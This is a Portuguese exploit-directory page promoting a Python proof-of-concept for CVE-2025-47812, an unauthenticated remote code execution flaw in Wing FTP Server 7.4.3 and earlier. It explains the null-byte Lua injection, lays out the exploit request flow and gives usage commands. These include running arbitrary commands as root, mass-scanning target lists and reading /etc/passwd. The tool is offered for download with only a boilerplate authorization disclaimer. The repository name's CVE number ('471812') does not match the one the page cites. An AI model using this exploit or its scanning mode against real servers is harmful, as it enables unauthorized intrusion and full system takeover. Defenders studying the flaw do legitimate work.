Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-471812-POC — PoC em Python para CVE-2025-47812, RCE não autenticado no Wing FTP Server <= 7.4.3 via injeção Lua com byte nulo em arquivos de sessão | Kitploit
Ferramentas/GitHubGitHub/d3vn0mi/cve-2025-471812-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubd3vn0mi/cve-2025-471812-poc

CVE-2025-471812-POC

PoC em Python para CVE-2025-47812, RCE não autenticado no Wing FTP Server <= 7.4.3 via injeção Lua com byte nulo em arquivos de sessão

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
root@kitploit:~
     ____  _______   ___   __ ____  __  ___ ____
    / __ \|__  /  | / / | / / __ \/  |/  // _/
   / / / / /_ <| | / /| |/ / / / / / /|_/ / / /
  / /_/ /___/ /| |/ / |   / /_/ / /  / /_/ /
 /_____/____/ |___/  |_/  \____/_/  /_/____/

CVE-2025-47812 — Wing FTP Server <= 7.4.3 RCE Não Autenticado

Exploit de prova de conceito para CVE-2025-47812, uma vulnerabilidade de execução remota de código não autenticada nas versões do Wing FTP Server anteriores à 7.4.4.

Visão Geral da Vulnerabilidade

CampoDetalhe
CVECVE-2025-47812
AfetadosWing FTP Server <= 7.4.3
TipoExecução Remota de Código Não Autenticada
Privilégiosroot (Linux) / SYSTEM (Windows)
Fornecedorwftpserver.com
Autor OriginalSheikh Mohammad Hasan, também conhecido como 4m3rr0r
Modificado pord3vn0mi

Causa Raiz

A função c_CheckUser() do Wing FTP Server trunca o nome de usuário em um byte nulo (%00) para fins de autenticação, mas o nome de usuário completo sem sanitização — incluindo tudo após o byte nulo — é gravado em um arquivo de sessão Lua. Quando um endpoint autenticado, como /dir.html, é acessado, o servidor executa esse arquivo de sessão, acionando o código Lua injetado com privilégios elevados.

Fluxo de Exploração

root@kitploit:~
1. POST /loginok.html
   username=anonymous%00]]<LUA_PAYLOAD>&password=

2. Server authenticates "anonymous" (truncated at NULL)
   but writes full payload into session file → returns UID cookie

3. GET /dir.html  (Cookie: UID=<extracted_uid>)
   Server loads session file → executes injected Lua → RCE

Instalação

root@kitploit:~
git clone https://github.com/d3vn0mi/cve_2025_471812_poc.git
cd cve_2025_471812_poc
pip install requests

Uso

Verificação rápida de vulnerabilidade

root@kitploit:~
python3 exploit.py -u http://TARGET

Executar um comando

root@kitploit:~
python3 exploit.py -u http://TARGET -c 'id'

Escanear vários alvos a partir de um arquivo

root@kitploit:~
python3 exploit.py -f targets.txt -o vulnerable.txt -t 8

Opções completas

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME]
                  [-P PASSWORD] [-v] [-o OUTPUT] [-l LOG_FILE]
                  [-t THREADS] [--timeout TIMEOUT] [--retries RETRIES]
                  [--no-verify]

target:
  -u, --url URL           Single target URL (e.g. http://192.168.134.130)
  -f, --file FILE         File containing target URLs (one per line, # comments allowed)

exploit options:
  -c, --command COMMAND   Command to execute on the remote server (enables verbose output)
  -U, --username USERNAME Username for the exploit payload (default: anonymous)
  -P, --password PASSWORD Password for the exploit payload (default: empty)

output:
  -v, --verbose           Enable verbose / debug logging
  -o, --output OUTPUT     Save vulnerable URLs to this file
  -l, --log-file LOG_FILE Write detailed log to this file

network:
  -t, --threads THREADS   Concurrent threads for multi-target scans (default: 1)
  --timeout TIMEOUT       HTTP request timeout in seconds (default: 15)
  --retries RETRIES       Number of retries on connection failure (default: 2)
  --no-verify             Disable SSL certificate verification

Exemplos

root@kitploit:~
# Check a single target
python3 exploit.py -u http://192.168.1.10

# Run 'whoami' and see full output
python3 exploit.py -u http://192.168.1.10 -c 'whoami'

# Scan a list with 8 threads, log everything to a file
python3 exploit.py -f targets.txt -t 8 -l scan.log -o vuln.txt

# Use custom credentials with SSL verification disabled
python3 exploit.py -u https://10.0.0.5 -U admin -P secret -c 'cat /etc/passwd' --no-verify

# Verbose mode for debugging
python3 exploit.py -u http://192.168.1.10 -v

Funcionalidades

  • Registro estruturado — Saída no console com código de cores (DEBUG/INFO/WARN/ERROR) + registro opcional em arquivo via --log-file
  • Escaneamento multithread — Escaneamento paralelo de alvos com -t para grandes listas de alvos
  • Repetição com backoff — Backoff exponencial automático em falhas de rede (--retries configurável)
  • Flexibilidade de SSL — --no-verify para certificados autoassinados
  • Escaneamento em lote — Arquivos de alvos suportam comentários # e deduplicação automática
  • Saída limpa — O modo de verificação de vulnerabilidade dá um resultado simples VULNERÁVEL/NÃO VULNERÁVEL; -c mostra a saída completa do comando

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. Use-a somente contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O acesso não autorizado a sistemas de computador é ilegal. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.

Créditos

  • Exploit original por 4m3rr0r
  • Modificado e melhorado por d3vn0mi
Baixar ferramenta